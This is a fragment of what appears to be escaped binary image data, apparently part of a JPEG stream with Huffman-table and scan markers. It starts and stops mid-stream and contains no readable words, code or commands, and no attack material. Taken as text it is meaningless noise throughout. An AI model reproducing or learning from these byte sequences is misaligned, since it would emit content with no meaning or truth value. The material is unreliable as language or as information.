+\x03\xc3.\x16qq*\x94\x00l\x07y\xacM\xc2X\\\x93\xf7g\xff\x00t\xc3\xf8@\xa1V;\xac\xf6}\x7f\xf9\xacc\x18\xe3\xf3\x82\x06\xf9\xbf\xac\xdfk\xff\x00r\xb3\xf0qs\x11\x9f>/=\xb5\x1d\xdd\xab\xaei2e\xdfW\xb8\xcd\xa5\xba\x1dG\x0e\xfd\x00T\xb2<\xb23\xb9\xcd\x98\xe6\x7f\xc3\xe1\xd8\xcc\xd6`F\xc3^>\xae\x91Q\xe3\xd8s\x8d\xb2\x14\xef\x14\xf8\xee\x1a\xbf\xfa\xa5\xbb\x81\xacC\x1e\x96\xe1Lp\x8dD;\xfa\xcf\xf8\xa5fV\x0c\xa7"7\x1a\xb2\xc7\xe06\xff\x00\xf5\'\'_\xfc\xab\x14\xc5\xde\xf7\x98\xa3V!\xd1\xd7\xff\x00\xf1\xb3\x7f\xff\xc4\x00/\x10\x01\x00\x02\x01\x01\x06\x05\x05\x01\x01\x00\x02\x03\x00\x00\x00\x01\x00\x11!1\x10AQaq\xf0 0\x81\xa1\xf1p\x91\xb1\xd1\xe1\xc1@P\xa0`\x80\xc0\xff\xda\x00\x08\x01\x01\x00\x01?!\xff\x00\xd2\xb6\x84\xbb\r\x06\xfd\xfd\xa7?\xf6\x87\xfd\x04w)\xcf\xe8\xc8[K\xba\x01o\xd3\x04\x069x@),a\x7f\xa3b\x8a\x8f\xd1c\xe1\x98f\x83\xbf\xe4\x98\x17G\x84\xd7\xa6\xe7\xd1@\x07k\x0e\x15\x9e\xaf-\xf8k\xbf\x84Y\xa5\xb9\xe3\xf4LHp}\xbc\xda{\xcc\x81U\'\xd1\x12C\xfd\xfeyQ\xe4\xfa SuZ\x86\xc6\x86z\xf9\xfae&b\x1bK\xc7O\xa1\xf7\xfa\x1a:\xf8S\xd4MK\xef\xf8U\x13t\x0f\xbb\x04,o_\rS\xae/O\xa1\xfc~e\x86`&!\xb9\x99\xac\x88\xd6"\xe7j\xee\xb9\xcf}\xe1?-9}\x99\xf9\xd3\xf64\xadts5\xafZ\x16\x9e\xa94\'\xa6\xf8*p#7\xaa\xaf\xa1\xa5,-o\xa4\xcc\xc1\x0b\xe3.\xdc\xff\x00H\xd5\xf6F\x03\xdd\x04Mvj3\xd4\x9c\'\xd6\r-tm\x12\xb5LHX\xd4\xad\x85\xfd\x12\xa7@o\xf0ki5\x93\xc0\x97\x1e\t[&\x8e\x7f\xfaf\x0b\xa15\xecJ\xb7\x80\x94\x0cO$\x00Z\xe98\xcf\xc8=\x1b\x9a\xa1\xf4CQ\xa2h\x86\xc7]\x0c\xf4\xe4\xa2,`\x83S|\xbf^\x03\x9d\xe0B\xf3=n*\xa1\xb04L~qoPt\'T\xbb\x10L\xcd\xf7\xdb\x1f\xa1\xac\n\xc2\x90\xda\xfc\r\xb8a\xef\xf1\xafm#\xe0\x18\xd1\xf4:\xa5\xb7x+\x1f\xf0\xf2]\xae\x05\xb3)\xed,\x9f\xa1\xc0VV\\\x1aXB\xb3~\xfd\xaf03\x18t\xf2\n\xfbh\x0c\xd8\xca\xe3rn|\xd3\xa7\xd0\xda\x15\xeb\xb2\xac1\x02\x18\xd7m\xd1\xf9\x9c \x80F\xcf\x15X\xcb\xa1\x1b{Nv\x01l(t=\xe1\xa0\xa1\xa1\n\xbb\x834\xfa\x15\xc8\xfa\xc6\x02\t\xc2(\x00PNZb\xc8\x9fc\x12u\xce\xb9N3>\xf0\xaf\xc2\x1d\xd8\xc0a\xdf\x0b-\xac\xeb\x95\x99\x12\x11\\\x10\'-9h:\x85\xbak\xe68\xfd\x08\'[\xbf\xe8A\x15\xf4"G\xf7\xff\x00\xe9w\xf4\x1c\xab\x88?\xe9A\xd4>\x83\xa5&|\xa0|L\xce\x1es\x8b\xed\x95\x7f<\xd7\xea\xe3\xe5\x0b\x0e,\xc14\xb1\xf4\x19\xaf*\xe0\x12\xc1X)\xaf&\xf6\xcbD\x05\xd2\x0b\xbc"P\x10q\xc2`?$\xe8,\xec\\m\xe7\xd0U`k\x8d\x8a\x7f? \xd8\xf2C\x80\xe0C\x01\xb4j\x90o\xf3\x1eNoKe\x8aq\xcf\xa0\x9a\xa6)\xa2\xb0\xd9Bq\xf2\x06\xc3\xc1\x8dF\xec\xc2\x07e\xc09\x93zC>M\x1dn\xce$\xe1\xcb\x93\xd7\xe8\x1d\x83\xa6\x07]\xb7\x17\x83\xe4\xef\x8bx\x84\x18\x9e(\x0e`\r\xc7Yp?\xc1\x12-\xaf\x92i\xf2\xdbRk\xf8\xfd\x03\xb9\xb5\xab}v\xd7\xf9yz3\xf5\x9a\xca\xea\xf9U\x7f\x00\x17\xd0TG\xb5U\xf4\x07\x80\xd7o\xa7\x81,c\t\xdc\xff\x00\xcb`\xe9\xe1\xaat\x1e\xff\x00@k\xe1\x1dQ\xff\x00W\xbd\xcf\xd0\x11=\xd3\'\x84\xf9\xc6\x91j\xf5?\xe2\xa67\x92\xa0\xcc\x18\xf0\x81\xbb\xb9\xf5\xfa\x04\xc0P\xd1\xe3\xe0\xe3\xb2\xc5\xff\x00\xe2\x854c9e\xc1\xc2\xfc\nC+C\x84r\xad~\x81i\x0f\xab\x0cr\x9fy\xcb}\xe6P~\xf3\xb2\xe7e\xce\xcb\x9d\x97;.v\\\xec\xb9\x7f\x94\xbf\xca_\xe5/\xf2\x97\xf9K\xfc\xa7u\xcb\xfc\xa5\xfeR\xff\x00)\x7f\x94\xee\xb9@s\xf5\x80`?y\xc9}\xe7\xceC\xd2\x8f(\x85\xa5x\xbf\xfbX\x02\xb4DH\x13Q\xff\x00\xe5A\x90\x90\xd5\xad<\xf2\xdev\x06\xa4\xf8\x19\xf03\xe0g\xc0\xc5T\x85\xef3\xe6noZ\xc8\x97u\x1a\xc2\x95\xceS\xcc\xfdI\xf1\xa4|m\x01k\xa5\xecn\xb8\xea\x18=e\xfe\x0ea\xed4\xfb\x1ci\xd6\n\x85\xb44\x83\x05n\x98\x9f\x03>\x06|\x0c\xf8\x19@9\x01\xaa|\x0c\xf8\x19\xf03\xe0b"\x8e\xb1\x0c\xcd\x97-\xf0&/S\xd3\xd8\xd5.\x81l\xf4\xc9\x8d\xc5\x06\xf7\x8a\x99!\xf5F\xf9\x96\x1dTx\r\xabJ\x0el\xf8\x19\xf03\xe0g\xc0\xcf\x81\x95\x03"\xdb\x92V\x9cf\x94\xa9ff\x0e\t\xe1$\xa0^\xf3\x13\xe0g\xc0\xc4{\xa85/>A\xb5iA\xcd\x9f\x03>\x06j=\x84b?\xf5\xd0og\xc0\xcf\x81\xf0\xe9\xcb\xd0\xd6|\x0c\xf8\x18e\x9b\xc5u\xe6\x0e\t\xf6\xe7\xc0\xc0\xad\xf7\x13\x95\x18o\xcb\xc6\x18J\xdeS\xe0c\xa1"\xfa\x90\xd1e\xa7\x04\xf8\x18\x1a\x89Uh\x1e \xc2V\xf2\x9f\x03>\x06|\x0c\xcck\xaeg\x87\x94\xd7\x17.\x0fJOi\x01\x88\x84\xf5\n||\x87x\xb9\xe9\x94D\xcb\xf7id\xd1\xeb\x00\xc4V\xc9C\xc5\x08!C\xa5\xcd4\xd8\x11\x9b\xf3\x86\xdbE\xe9\x9d\xfez\xf4\x19y\xe5\x9d\x81\xd57\x9a\xb8\x1f\xcda\xa2y\xb8\x16\xdd\xfd\x8d\x10\xb9\x83\x8c\xd1]\xb0\x9a\x97\xf7\x86\xc3\xb1pK{\x87\xcf\xe2\x86q\xb0\x14\x1b(\x165\x19\xdc^\xc6\xef\\\'\xfb\x84\x1c65M,*\xb8\t,K\x19e\xe2\xa6v\x1b\xd6\x1c\xb5u1\xfc\xef!\xad\x98u_\x9d\x8d^4\x13\xc9\x87]\x889\xb0\x9e,\xe7/\xd6\xcd\x1e\xd1\x1e\xd2\\(\xe5Q\xad\xe2\\\xd6\x01\xe3\x966h\xfet\x8ev\x17\xe3\xa7\xb9!\xf8\x81v\xc2\x0b\x99\xafG\x84tL\xa5\x10?\x9a\xc3D\x9c\r@\x02a\x96\x1d\r>B\xb1H\xaf!\x8e\x8b)V\xfd\x86\xf6\xee\xf1$\xb3\xaeM\xc4\x1d\x04\xc1\xa3\x0e34*\xad\x9e\xfb\xc0\xe5\xafl\xc9\x9d\x89\x8f\xa9\xa1\x04\x16d`\xd4YM\x01\xdf\xe5\x96\x11\xce\xae\xb6_n\xf5\x8e\xee!u\xdc.g\xcb\xdc\xf4\xf1\x0cS\xae\x166nQ\xd9\xf8\xa3\xc7U\x1e+\x95\xa8B\xb8\x8c\xba\xb7\x1e\xad\x95\xe2LNuu\xb1k\x05#\xa5&c\xfdYe\xce\xcf\xc1\xf0\x13\xfb\t\x9f\xb8q\x97\xbfX({\xa2_\x948d0\x99\x18\x9c%1\xc0\xb1\xaa\x8f\xef\xc3\xa3\x87\x1e\xb0\xc4\x94s\x17\x16 @\rV\x0f}\x94\'\x0e\x93\x7fK\xf77\xb4J\xa2n<\xef\x1ez\x06\x9c\xe4t\x8blU\xa1\xb5\xe0\x01B:L\xe1#\x7f\xd1\x08uv\xfd\xb4\x95g\xd1\'\xe2!\xa9\xef\xaeN!`;\x92>,F\x9d\xfe\x93\x15\x95F\xef\x99\x0fo\xe5\xb2\x1cN\x8dQ\xa7;\x82\xb9\xa3oj":\xf8-\xb3=@[\xcd\x0c\xf8o\xeaa,\xb5Z\xcfw\xf9\xf6\x1b>\xeaA\x93K\xd4\xd6h>\xd4\xe3\xca\x00]\xf1`tKm\x9f\x83\x0cf\xac9\xaf,\xcf(y\xceC~\xce\xdf\x9c=44\xbeR\x94\x1a\x06\xfc\x9b4\xf7\xee\x82\x8b_\x9a\xb5\xd9\x8c\xfb\x84\xae\xae\xcd>g\xae@\xbb\x085t\x99u\x14\xc67\xb6\x93\x16u3\xb4\xdf\x82j\x1d5V\x9de\xe9_\xa2<X\xea _\x90\xd7\t/\xd6\xad\xccoO\x99\x95\x13\x85F\xc0A\xc0Z\x00EqU:\xaa\xae|7\xf5-\xbf#pU\xe2\xf6\x19\xdaxf\xa1\xaeSN#\x0es\xf5\xa2\x0c\xdf5\xae\x1b\x88\xed\x1d~\xd0\x86\xdc\x8f\x0fi\xa7\x1b+f\x8e=5\x17\xf5\x05\xea(r%\xcb\xc1O^\xb1\xf6\xb7\x9f\xf0Jk|T\xff\x00\x13\xa8}l\x088o\xa3\xd7\x9c\xed\x1c\x1b=\xb6\x02\xaf\xc4sb_\xdf\xce,N\xee=\xadg\xc3\x7fS(\x1e\xc7q\xd2a\xec\xc8\xd6g\xc3\x7fR\xfb\xe8W\xc0k\xc71\x90\xd5\xad\xaf\x13t:\xec)8\x8csR\x1c\xe5ya\xcb\xf5o\xb4\xa6>\x89?\x11>C}pz\xc2R;\x92{\xbd\xad\xfd\xdc\xec\xdc\xf6\x0f\xcai\xcfP\xd0Cw\xe2\xb0{K\xf6%c\x8dO\x86\xfe\xa5\xc2\x9e\xc3S\xdbl?\x8aA3Ff\xd68\xde\xa4<\x1dN\xb6:\xf1.\x9f\xd4\xbf\xbb\x1bn\xb8\xa3!\xb7\xde\x91@3\x1fM\r\x8a\x0e\\8\x10\xa7\x04\xfd\x8d\x98\xa2-!\xc6\xc9\xf0\xdf\xd4\xa4p\xeb\xa2N\xb1\xc3\xfa\x83O\xb5\xfdN6\xcf\xbb\x06\xccK\x02;\xb1\xb9\x99\xa9\xf6e\xfb\x88\x9d4W\xf5\xa6~&(\xc5s\xd9\xc5\x1a\x9e\x90y\xc8\xfb\xab\xf3\xfbO\x1f\x03\xf7\x87\x97\x01\xc2J\xf6/j\xeeg\x92\x06\x8c\xeb\x95l\xe3\xda\xe3e\x95s\xd08\xcdocz.e\x05Fzl\x0b\xd5\xef\xf2\xec\xbb3#\xbd,\x9a\xec6\xe3a\xfd\xdf\xe7\xd9F\xed?\xc0\xd9\xa4q\xb7\xdb\xb0SFs\x1e\x04v\xfc\xfc\x0bo\xfc\xf0ipHj\xf6\x1d\x01_$\xefb\x0e\xbf\xb88"R\xad\xae\xae\xcao\xcaX\x01\xb4h\x1b\x1d\x84@6\xc2v\xd1\xe7\x12)\x80\xba5\x95\xa3\xef\x95\x87\x0b\x94\xe7\xd9o\x9e\x17\xaeh]\xa5X\xa7\x8e\xce\xed\xc3\xc0%U\xf5\xcdg\x91\xd7\xb0\xce\xd3\xc3\x02\xef\xf2\x0ee\xadM5\x86z}"\x9f\x92q\x01\xe1\xfc\xe0\t\xa2\x9f\x0b\xa1Ic\xcc\x9b\xc5(8\x1df\xaaIz\xcc\x8a\x13\xf93M\xb7Nn\xe2=Y\'\x9a\xa0#\x81\xben\xf6]3\xac\xa2N\x91\x8dv\'nR\xc5\x89\xf7\xb6v\x8e\r\x8b.\x0c\xa4\xfb\xa5\x0e\x8a\x98\x16\x88\x0c\x8f:\xd72+W-3\\\x12\xac\x0c\x9cFg\xfd\xd79x\x9c.\x1az\xac\xbd:=\xe7\t\xabe\xea>Dr\xdd\x1b\x1a\x0bh\xf1i\x8es:?e\xc6\xa0s\xa5\x9f\xa5l\xafz~\xf9=\xdcZ\xb1%8\xe6[Z\xc1\r\x1b\xa9\xd3\x9cD\xdb\xce\xf1\xa2{\x07\xe51|\x98\xe0\xbc\xe1\xc5\xdd\x02\xdd\xb2\xc2\xad\xb3Ut\x91\xd5=\xb6\xc2H\x14\xd4\xa4\'\xad\xd0\x1d\xdb\r\xa2\xd4\xad`#\xa0\x00\xb5w\x13\x86d\xb3$\xa6\r\x9d\xb3k\x97\xef/\xb1\x84\x8d<\t\xac[\x1dib\xe7t\xe0\xc4\xcf0T\xfc\xac\xf6\x91\x88\xa4\xb8\xc3\xac8\xbfy\x00 \x8e\x89\xb0T\x1dy\xfd\x9cw \xd0l/ZS\x9b\xf0\xc0\n,JHB\x95\xe9\x9b\x8f\x9d\xdax\xf8\x1eO0\x876\xf8\xc8S\x93\x91/"\xd7\x055\xb5{w\x07\x82cv\x9e\x0e\xcd=\xbf\x1f\xdd\xfe}\x8cf\xa2\xfb&\x92\xaa4\xcf{p\xe7\x01\x1a\x9cS\xec3{:\x05,U\x15xx\xf8>\x04v\xfc\xfc\x0b\x01\xc2\xb3\x95E\xc4}\x9d\x96\xcf}94f\xb0I\xf5\x9a\x83 \xfaM\x07~\xba\xd1\xbb\xa7=\xdf\xcef\xddTN\x91\x7f\xae\xef\x13\xd7[)\x9e\x93\xac0\xe5?\xf5\xf7\xc3\x1aR\xb4g\xa9\x0c\x0b\xf52\x13\x0f\xccK\x8by\xb3\xbbp\xf3\x04\xf3\xafa\x9d\xa7\x86[\xe0\x99\xdc\xbe2\xe0\xcc\x00[\x04\xea\xe1\xa3\xd1\x98\x9dx\xb40\xb5\xcb\xea\x1e.:\xdfOf;\xf7\x84g]\x7f\x9c\x05\xb4[\xe8\xc1\xb2,5\x8b\\cg\xd5ew\xa9\x92\xa7h\xe0\xd8\xa6S\x7f\xae\r\x9a\xe9\x1a\xeb\x88\xd7\xd5do%\xf0\x9d\xc3n\xa1]\x9e\xbdf\x94<zO\xe5G\xd7\xc8\x99\xc8Yp5\xc0\xdcDB\x80\xb5\x9873\x7f1\xb7\xa6\xa7"]+\xbd<\xd6\xce\xe5\xc2{\xb8\xee\xf9\xcet\xc7\xb7]\xbe\xc1\xf9M\x04\xbf\x19\rk\x06\x9dW*o\xe3\xb6;\xf7\x16{m\xaf7*\x01m"\x00\x13V\x93\xb7p"(\xd8X\x0c\xa5\xf96o\xcd\x13\xdd?+A\xc7`\x81\xd6\x91Z\xc4H5\x8c\xb3V\xe2\xe7\xb4\x9a|\xe1i\x91\xe59\xee\xfep\x9e\xcdX\xc9\xc1\x06\xf5\xa5u\xd9\xaac\xfa\xb1\xb3pA\x96\x83\xc8zG\x12\xda\xbf^v\xbc?\xcc\xe3a\'\x86\x8b\xa8\x19\xce\x06\x81\x01 \xa79\xdeK\xb5(\x1cF>\x10\x1a\xc2;\x08\xba\x07\xa9\x0b\x90h\xde\x8de\xa7\x188\x8c\xbd\xc2\xe9\xd7b\xca\xa0\xc6\xbb(\xe833pT\x05%\xa0\xdd+1\xb7n2\xf5U:-\x857\xc5\xc6~i\r\xfa\x87Y\x0b\x13#\xb6\x85/\x8b\xfd\xf6/\x92\xe37{\x0c*(E\xc2\x02\x80\x83\xd6[\xae{c}\xe7\x82\xea\xe1\xc8\x15\xe8i\xb3\xb3\xf1\x8bE\xcf\x921\x9d\xd7>\xc37\xbc\x84`\xd0\x01\xb2\xf4\xc6\\\xdc6\n#\xc0\xaa\x8d\xe3Lt\x85\xb5m\xeb1YS\x91.\xf6h\xe3\xd4\xceM\x9a\x99\xf13\x83f\xf3\x1e-\xb1g\xd4\x06\xf7\x87\x92h$1%\xa0\xd0&\xbc\xa44b\xbb\n\r$\n\xac\xaf^$\xfb\xcb.\xfb\xc2\x88\'\xee\x95\x98\x1a\xb1\xbdW\xe2\xa4\xc1\x13\x994>\xb58;\xc8\xb7\xd0*\xf2\'.\xad\xc0i\xb2\x85\x98\x07u\xbeu\x0f;\xbaJ\xee\xeeQ\xf6e\x7f\'\xc5\x83\xaa\xf3x\xe7`\xdf\xbb\xf7\xe1P\xba\x07\xee\x13Q\x13\x05\x8c\xb5\xa5\x88p4&\xa1v\xd7\x13y/D_Rf\xc9\x02\xabo\x88J\xae5\xae\xca\x8d\xde\xf7\xd7\x15\t\xea\x94L\xff\x00\xbf\xc8LIu\xc7\x12X\x99\x83\x88\xc5\\\x01\xe1;\x12f\xa5}U.6\x02\xbb\xe5\x1d\xedq!\xd8\xab\x87\x1b\x9b\xb2u\xca\xd8\xf6\x0f\xcaS\xa1\xbb}3\x1a\xca\xaf\xcd\x80\x14\xdd\xb3\xbfqc\xa0p\xadv*\xa8\xb5\xbc\xb3.J\xf7\x16\xce\xcf\xc1\x86\x98\x04\x1cR\x02\x12\xd2o \xde\xaa\r\xd8\x97\xfd\xe1\x7f\xb1\xd2oK\x019o\x82\xfc\xa1S\x06\x81\x80\x8c\xcf\x8e=H\xf4k:r\x9a<}6\xe6\x19\xc6\xa0X\xccA\x8f\xc0\xb6\xc6o\x918\xb6,\xb4\x9b\xd0\x9c`\x06\x85l\xd3\xa6\xc7\x13v\xc2\xe5\x1f\xfb/\x83\xb0\xf3\xf3\x92.\x9c\xe7tN\xe8\x8e\x056\x9b\xd8\x01\x114H\x0e\xb4\xe63\xd3b\xc0\'\x02\x8e\x84\xd5~\xa6\xf8( Q\xa4\xee\x88\x03\xab`d\xd1;\xa2.\xb5\x9f`gt@AB\xe9\xa9c;\xa2w\xe4\x1c\x0fu7\xb3\xba&du\xdbf\x83\x1e\xaf\xb1\x85\x7f\xe4\x8f/|\xaf\xb6\xd2>\xb87N\xe8\x9d\xf9\x11\x0bV\xd6\x1b\xbd\xd87\xce\xe8\x9d\xd1\x15\xbd5\\\xb6-\xf4/}a9\xbc\xa9P+At\xe7\xc28\xcbtn\xb2\xa7tE\xc7\x12\r6\xeb>\xc3v\xe2"\x1fn\xb6\x15\xdb\x060\x13\x95\x95\xcax\x93\x1d9\x84\xcdLL\x96\xbb\x05|(1\xa1;\xa2?H)1\xb38"\xe9\xcewD}e|\x8b\x83\x83\xec\x7fg\xc6\xff\x00g\xc6\xff\x00g\xc6\xff\x00f5\x05\xdfN\xe8\x9d\xd1\x0b\xf3\xf0\x02o\xe09O\xd9>\xf4\xcec\x83M\xa1\xb9\xe8B+\xc2]c\xe3\x7f\xb3\xe3\x7f\xb3\xe3\x7f\xb0\x8e\x9a\xa5\xc7ndE\xd2\x10;\xa1\xc4\xda\xf5\x81\xb10\x90-/RU\x8e\x93\xff\x00b>?\x974\x8f\xa9\xbawD\xceH\xbbr\x9cx\xf5:\xf5\x98E\xd7$s\x8dh\xb5\x99N\xb5^\xea\x9aW\xc7\x90\xe5SN\xe3ffhag\rq\x9f\x1b\xfd\x9f\x1b\xfd\x9f\x1b\xfd\x80\x0e\xafn\xc0@=\xb9\xdd\x11X9k\xf3\xbf-\x87\x94\r\x89\xa9\r\xd7\x9c\xc6z{\x18V\x80\x14i5."\x80\x00Vt\x9d\xd1\x06\xbb\xa1xLh\xaa\xe4N\xe8\x80\r\xd0^\x10\x19kK\x96\xf9\xcby\xff\x00\x04%\xeb-\xef\xbd\x89\x05\x8c\xfc\xa0\x00\x14\x9d\'tN\xe8\x9d\xd15p\xebq\x80\x00\xa4\xe9;\xa2=\xe6\xdao\xd9~\xaf6\xbdat\xf7\xdd\xd3\xec\xa4\xc8\xf17T\xb7a\xa1}\xe4\x1eo\x9eH\xd5 y.\x13\xba"\xa7\x13^\xff\x00$\xef\xc9\xce&\x15=F\x08\x8d\xaf|\xaf\xb6\xc0HW@\x8f\xf4\xdb\xe0\xe2%\x9b\x8fW\x1f\xf9Ckp\x1c\xc7x\x83N\x9f\xf9%\x80K\xd4\xb8]\xba\xf0\xce:\xbd\xd9\xea\xcbF\x02s\x7f\xe7\xed\xa2\x8a\x87\x16\xb8?\xf9p\xd6\xb9\x0f\xf7F[\xae\x7f\xd5:\x85Xj$\xf4s\x8b\xf4M[\xce\xae\xbf\xff\x00\x1b7\xff\xc4\x00.\x10\x01\x00\x02\x01\x03\x02\x05\x03\x04\x02\x03\x01\x00\x00\x00\x00\x01\x00\x111\x10!QAa 0pq\x81\x91\xa1\xf0@\xb1\xd1\xf1P\xc1`\xa0\xe1\xc0\xff\xda\x00\x08\x01\x01\x00\x01?\x10\xff\x00\xa5h\xc7\xdd\x89J\x9f\xf5g\xfa\xca^\x9f\xc97\xa9\xfc;\xa3\xa0\xa3\x85\x9e\x8c\xa6\xc7P"\x96]`9\xa1@<#\x06\nD\xb8\xde\x9e("2\xfa>\x8b^\xa5e\xe8\x12\xd8\x89\xbd\x1c\xe7\xc8\xb3\x9e\xdb9Q\x10Y\x8b\x0f\xa2\x88\x9d\xf4\x04\x15\x84/\x95\xf2\x8d\x9b\x85\xa50\xe4\x82\r\xaflz$\n\x80Z\xc3K\xbe{#\xe5\xd1\x1d\x82\xa5\xf11\x99.\x93\xd1\x1b\x1b\xe19\x8d\x8cy\xdbd\xd2\x13\xa9\xcf\xa2\x03\xed\x88\x1e\xf0\xba\x19\x1c\xf9\xe3\x86\xdc\x08Cl\xb3\xe5z\x1ec\xbfy\xe0\xbbf\rc\xf7I\x8d\x9e\xf0\x97\xf3j\xaa\'\xf3L\x9d\xf6\x83\xc3\x1e\x04\x11\xc4\xad\nvb\x9e\xc1\xee\xbd\x0f\xb2\n\x1f\xaf.\x1cy{\xc7\x95\x1e\xc1\x16i\xfb\x11\x05r\xf4\x18\xb4\x01p:\xc9\xf2\x83\xe9\xf9t\xb6J\xb9\x11]g\xb4 \xdb\x1d\xa1y\x03\xab\xa8\x95\x14\x1e\x04jQ\x8eP\xbc\xb6\x8ap\xa6\x13%e|z\x1a*AW\x15\xba1\x01\x89\x85\x9c\xc4\xb7\xad\xfc\xe5\xd0\x97\x83y\xd8\xfa#\xe0b\xf0\x97@>\xcd\xc7b\xd6\xa2)c\xc1\xbc\xec}1\xa0\x02a\xfd)Z5(\x90\xeaN\xf2\xe9\xc9\x08\x9c\x7fk\xe8\x95*\xf6\xd9|3\x03\xd2O\x00Pl\xca\x83\xb7W\xcf\x82\xdfCO\x03\xe5\xef\xe8\x89\xa3\xf4\x8b\x02\xb4H \x1b\x0b\xa5\xc6\xc0\x80\xdf\x92\xeaU@\xca\xc7}/\xf6\\\x11\xa1^#t\xe7\xa2\x0c\x8d\xb8\x0fl\xd0\xd8\xb8\x83f\xa7\x1aTb\x08\r\x889\\\n\xf5\xfaQ\x1e\x90\xc07<\x18\xc0\xa4\x9e\xba\xa1$\xe3\x80\xe79aA\x15\x00f\xcb E\x12\x93\xd0\xd3R\xc1\xdc\x8d\x03\t\xa9\x18\xc7\xf43\x19\xa4\xe9o.\xb5>\tn_\xae\x97\x92\xa0>\xbd\xf7\xb2\xcd\xb4\xeb:\x11\xf49\x15\xb7;{x\x01\xd6\xf5>J\xa4L\x85R\xb7>\x86\x9b\xc0\xeb\x0e\xc1\x15U}\r\xbb\x91\x80\x8e\xd8FT\xd3C\tZ.\xf3Q]\xaa\x08T\xedv\xf1\xf3+E\xdd\xafB\x05\x00\x1b\x18\xd0e\x8a \rE\x0c\x16\xb2\xdd\xcf\xa1\xa6]\xd8\xa0\x91,D\xbb\xc9\x10*\xdb>\x92\xf9\xef\x13yS4\x96\x96\x0e\xb2a%mr\xa5j\xe1@\xed\xf4\xee\xcd\xdc\x84\xa7V;p"\x96m\xd3\x00\xfc\x14\x11\x1e\xd8^\xe2"\x91)2z\x15\xbf\xa5y\x83r\x11y@\xfd\x00\x1aB\xa8E\x9b\xc5\xe4\xdf8\x19^R\xbc\xe2\x9b0\xb1\x1e\x8b\xa3\xc3\xc0\x04/\n\xba\xd2<\xcc\xdb\xdd\x95\x8d\xeb\xb8\xa2L\xb8@|\xa05\x80\xa4{m\xe9\xb9\xbc_\xc1\xe8F\t\xf1\xf7\x87\xe9\xcb\x9b\x18\xbcK\xb7\xa0\xe5_Z~\xa4\xbd\x81\xe88\xa9\x88`\xfd3)\xda\x12\x1d\x80\xdc\x8f\xa0\xf9\\Pe\xaf\x92\x8a\x06\xeb\x8e\xa6V\xa1\xcb)[\xd7\xdal*^\x05K\xff\x00h\xe2\x05\x1d\xdf%st\x9fX\x0cyT\xea\x1e\x83\x18\xee\x82\xf0R\xc4^\ny9\x884\xe8G@0+\x80G\t\x0b+\x82\xa1\x0e\xe1\xd9\xe1\xf2N\xc9\xd5\tb%\x89\xb9\x05J;\xe8,s\xf5{\x1e\xd5*l6<\x80{\xac+\x1b\xa0\x10\x90\xe9\xbe\xbbi\x8a\xb9\xd7\x92<\x92\xdf\x8e\xd0\t\xd8\xbe\x82DB\x84\x98\xbc\xa16\x8bK\x87\x91[\xe4\x19k\xca\x14\xea$\x00^\xe4\xc6n\x02+\xea\x8a\xbffG\x01-s\xe4\t\xb5\xd4\xd1\xdcB\xc4\xa4\x8e\x11\xbd\xf1\xfa\x06`\xfb>\xea\x95Zm<_"\xcbe\xcb\x1f\x85\xb2\xb0zX\xe4c\xa5\xf7UC\x8b\xfb\tw\xa5\xf4<\x83t9a\xd5\xe0\xe8JW\xd3{\xbf@\x81P!\x82\xa7\xf25|\xc6\x8eC\xc9\xa8 \x01\xc0\xc9\xf7i\x18b\xbc\x8d\xa2\x8b\x84J\xa2\xb5\x1f\xc50:\xd2}\x01Z%\x8f\x85\x14\x00\x1a\xd4\xfb3 \xc9\xfaF:+a\xbe\x07rQ\x8a\xb2\xfb=\x01\xc8r\xf0$F\xb8\xaa~\x95NJ\x07\xa0\xc8\xe7\xf6=\xe5\x8e1\xafhT\xc6dT\x8f\xban\xde?B#\x88"\xcet\x95d\x18\xf0\xb77k\xee\xf4\x04(\x89\x0c\x88A\xb0ua\x05Q\x8b\x8a"\xd7\x9be\xdf\xe8U\xb4=\xa1\xd0\xa5\xe1c\x90\xdd\x03\xe7^9\x8f\x90v\xbf\xb9\x8f\tv\xbe\x81\n\x84Q0\xc2L\xbc\x10W\xbf\xd5\xc2}\xd4S\x92Jfv\x95\xa5iZV\x85\xa0\xf1\xbcH\x88\x88\xbf\x84\x88\x88\xbc,\x00\x07\x10)B\x12\xff\x00\xeb\xe7\xf7YqK\x8e\xf1\xfbVR\xdf\xfbX\x00\x05\\\x04xM@D{\x8f\xfc\xaa\xba\xf7RKr\xf9\xe0\xb9\xbba<;\xde\xf6\x1d\x90ET\xf3\x08\xe47*\xcaM\xdf\xdb\xc3\x10\xa20F\xc1\xa6\xe1>1\x05gCq\x03T\x9e\xf3\xa2)"->\x92p\xa4\xdd\xee{\xea6\x0f\x80\xc0\x88\xa8\x02\x8f\x0f{\xde\xc1G\xf7"\x97O\x87{\xde\xc5\xa4\n\'r\x05\x9f\x8a\x03\xcf\x18F\x19\xaf\xd7\xa3\x91\xa3\xbb} \xc5\xc6.\x03\xbb\xcdE\xee\xcb \x97\xbc\x14\x9bP\x8e\xd0[\xe0md\x9b*Px\xb7\xbd\xefi\xcfu\x8c\x9aV+\x11\\4\xae\x95s\xca)<.Q\x00\xad\x1a\xb7\xbap]:\xa0\x0f!5\x82l\xa9A\xae\xf7B\x0b\xdb\x85\xb4@\xfc\xdc\xc2`5\xdeQ\x14rx\x04\xee]\xb1\xab{^w\x93\xfe\xaf1\xfa\x84\xb14\xed\xf7\xc1\xb8\xef8\xa1\xe31\xe0\x08\x9avU\xe0\x82\x9a\xc1\x95 oZazm\xd9Mv\x02\xd7\xc4\xc5\xc0"x;\xde\xc3\xba\x92\x14[\xc2A\xd3\xaf\xa43\xda\xf2\xae\xa0\x1c\xbcQ{H\x17\xb8\xf8\xc1\xb6u\xd49x!d\xee\xfb\x07\xde\x1a\x05}\xdc\x97\xea\xad\xf9SR\x8f\x9d\xea\x18\x0c\xe4\xb0\xa1\xca\xa1fjx\x876\xc3~->\x93\xe7\xa3|\xb4+\r\xc7F\x87\x94Bi\x0f\xbd\x93\xb4u\x1f7\xcc\xfd\xee\x83\x12\xc1\xc377\xcb\x88\xd7\'\x17V\xde\xfe\xeb}\x02\x19:^,\xa7\xbb\x8c\x06\x83\xfe\x8d`[\xe8\\\xfb\x9c\xfc\xaf\t\xf4\xf3\xdf\x0bJ y\x0cC:00\x8e\xe2@\xddi\xa5\x80\xd0\xa2V\x03\xcc\xa9\xbbq\xd5P\xd1\x08L6\x8a\xa2\\\x80\xa4h|\xe8-\x04.\xd3f\xca\x02\xa8\x06X\xf9\xdd\xa9\x1eF+*_Cv\x87\x86?\x82\xe1\xa6\xf2LVy\xf4&\xd3\xb0\x9c=0\xbf\xd8\xdfA\x96\xee`\x85%v\xfab\xb8\x8f\x84\xb5 